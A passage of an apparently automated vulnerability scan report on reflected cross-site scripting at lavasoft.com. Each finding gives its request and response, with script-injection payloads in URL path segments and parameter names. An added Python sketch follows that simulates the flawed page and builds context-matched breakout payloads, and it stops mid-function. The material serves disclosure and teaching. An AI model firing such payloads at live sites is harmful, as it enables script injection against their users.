Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Set-Cookie: country_name=216d0%250d%250a219d2569ef4; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10645
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/cssd2b62'><script>alert(1)</script>1aabc7e254/print_lavasoft.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.155. http://www.lavasoft.com/css/print_lavasoft.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/print_lavasoft.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 502bc'><script>alert(1)</script>e34a2f2501e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/print_lavasoft.css502bc'><script>alert(1)</script>e34a2f2501e?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Set-Cookie: country_name=216d0%250d%250a219d2569ef4; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10646
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/print_lavasoft.css502bc'><script>alert(1)</script>e34a2f2501e?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.156. http://www.lavasoft.com/css/products.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/products.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48fb6'><script>alert(1)</script>1d5f7324bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css48fb6'><script>alert(1)</script>1d5f7324bb1/products.css?38180ee2adff20f2975ec0c47808bb0e HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:18 GMT; path=/
Set-Cookie: country_name=f3dbcdd2fdcc54fecafaf6b0; expires=Sun, 06-Nov-2011 12:27:18 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css48fb6'><script>alert(1)</script>1d5f7324bb1/products.css?38180ee2adff20f2975ec0c47808bb0e'>
...[SNIP]...

1.157. http://www.lavasoft.com/css/products.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/products.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b696'><script>alert(1)</script>1a92eb01410 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/products.css9b696'><script>alert(1)</script>1a92eb01410?38180ee2adff20f2975ec0c47808bb0e HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:19 GMT; path=/
Set-Cookie: country_name=f3dbcdd2fdcc54fecafaf6b0; expires=Sun, 06-Nov-2011 12:27:19 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/products.css9b696'><script>alert(1)</script>1a92eb01410?38180ee2adff20f2975ec0c47808bb0e'>
...[SNIP]...

1.158. http://www.lavasoft.com/css/selector.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/selector.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85071'><script>alert(1)</script>dbb72c49636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css85071'><script>alert(1)</script>dbb72c49636/selector.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:12 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:12 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css85071'><script>alert(1)</script>dbb72c49636/selector.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.159. http://www.lavasoft.com/css/selector.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/selector.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faae5'><script>alert(1)</script>8317c119fa0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/selector.cssfaae5'><script>alert(1)</script>8317c119fa0?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/selector.cssfaae5'><script>alert(1)</script>8317c119fa0?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.160. http://www.lavasoft.com/css/singlecolumn.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/singlecolumn.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f0b3'><script>alert(1)</script>f688db7b221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9f0b3'><script>alert(1)</script>f688db7b221/singlecolumn.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10644
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css9f0b3'><script>alert(1)</script>f688db7b221/singlecolumn.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.161. http://www.lavasoft.com/css/singlecolumn.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/singlecolumn.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1dcf'><script>alert(1)</script>61823a841a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/singlecolumn.csse1dcf'><script>alert(1)</script>61823a841a?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10643
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/singlecolumn.csse1dcf'><script>alert(1)</script>61823a841a?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.162. http://www.lavasoft.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fbd0'><script>alert(1)</script>fa4d70e4e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9fbd0'><script>alert(1)</script>fa4d70e4e78 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Set-Cookie: country_name=United+Statesf3dbcdd25c35ee7f50f33c20; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10602
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/favicon.ico9fbd0'><script>alert(1)</script>fa4d70e4e78'>
...[SNIP]...

1.163. http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /img/gradient_black_dgrey_v_100.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81900'><script>alert(1)</script>5e10506606b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img81900'><script>alert(1)</script>5e10506606b/gradient_black_dgrey_v_100.png HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:24 GMT; path=/
Set-Cookie: country_name=United+Statesf0935%00%0D%0Ab78d89cedcf; expires=Sun, 06-Nov-2011 12:27:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10625
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/img81900'><script>alert(1)</script>5e10506606b/gradient_black_dgrey_v_100.png'>
...[SNIP]...

1.164. http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /img/gradient_black_dgrey_v_100.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ac96e'><script>alert(1)</script>945c7d74830 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/gradient_black_dgrey_v_100.pngac96e'><script>alert(1)</script>945c7d74830 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:25 GMT; path=/
Set-Cookie: country_name=United+Statesf0935%00%0D%0Ab78d89cedcf; expires=Sun, 06-Nov-2011 12:27:25 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10625
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/img/gradient_black_dgrey_v_100.pngac96e'><script>alert(1)</script>945c7d74830'>
...[SNIP]...

1.165. http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /img/gradient_black_dgrey_v_100.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 54fe6'><script>alert(1)</script>460b86e196a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/gradient_black_dgrey_v_100.png?54fe6'><script>alert(1)</script>460b86e196a=1 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:24 GMT; path=/
Set-Cookie: country_name=United+Statesf0935%00%0D%0Ab78d89cedcf; expires=Sun, 06-Nov-2011 12:27:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10628
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/img/gradient_black_dgrey_v_100.png?54fe6'><script>alert(1)</script>460b86e196a=1'>
...[SNIP]...
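Findings 1.163 to 1.165 are the same flaw probed from three positions: the first path segment, the second path segment, and the name of an extra query parameter. The shape of every payload in this report (random prefix, a breakout sequence matched to the attribute's quote character, random suffix) suggests the scanner first locates a benign canary, classifies the reflection context, and only then sends the context-specific payload. The Python below is an added illustration of that procedure and is not code from the XSS.CX report or from the scanner that produced it. It runs offline against fake_404_page, a constructed model that reflects the requested path into the login link exactly as the responses above do; the real template is not on the page. The URL helpers make precise what the headings mean by "REST URL parameter n" and "name of an arbitrarily supplied request parameter".

```python
import re
import secrets
import string
from urllib.parse import urlsplit, urlunsplit


def fake_404_page(requested_path):
    """Constructed stand-in for the lavasoft.com 404 page: like the responses
    in the report, it copies the requested path into the login link's
    destination parameter with no encoding.  Not the site's real template."""
    return ("<html><head><meta http-equiv='Content-Type' content='text/html'></head>"
            "<body><a class='login first' href='/mylavasoft/login?destination=%s'>"
            "Login</a></body></html>" % requested_path)


def canary(n=10):
    """Benign alphanumeric marker that survives any output encoder."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def inject_rest_param(url, n, payload):
    """Append payload to the n-th path segment (1-based); this is the position
    the headings call 'REST URL parameter n'."""
    parts = urlsplit(url)
    segs = parts.path.split("/")          # segs[0] is '' for the leading slash
    if n < 1 or n >= len(segs) or segs[n] == "":
        raise ValueError("path %r has no REST URL parameter %d" % (parts.path, n))
    segs[n] += payload
    return urlunsplit(parts._replace(path="/".join(segs)))


def inject_param_name(url, payload):
    """Put payload in the *name* of an extra query parameter (finding 1.165)."""
    parts = urlsplit(url)
    query = (parts.query + "&" if parts.query else "") + payload + "=1"
    return urlunsplit(parts._replace(query=query))


# Matches an unterminated quoted attribute value at the end of a tag fragment.
_ATTR_TAIL = re.compile(r"""([A-Za-z_:][-\w:.]*)\s*=\s*(['"])[^'"]*$""")


def reflection_context(body, marker):
    """Classify where marker lands: ('absent', ...), ('text', ...), ('tag', ...)
    or ('attr', attribute_name, quote_char) for a quoted attribute value."""
    idx = body.find(marker)
    if idx < 0:
        return ("absent", None, None)
    before = body[:idx]
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt <= gt:                          # last '<' already closed: text node
        return ("text", None, None)
    m = _ATTR_TAIL.search(before[lt:])
    return ("attr", m.group(1), m.group(2)) if m else ("tag", None, None)


def breakout_payload(context, prefix, suffix):
    """Second-stage payload in the report's prefix/breakout/suffix style."""
    kind, _name, quote = context
    if kind == "attr":
        return "%s%s><script>alert(1)</script>%s" % (prefix, quote, suffix)
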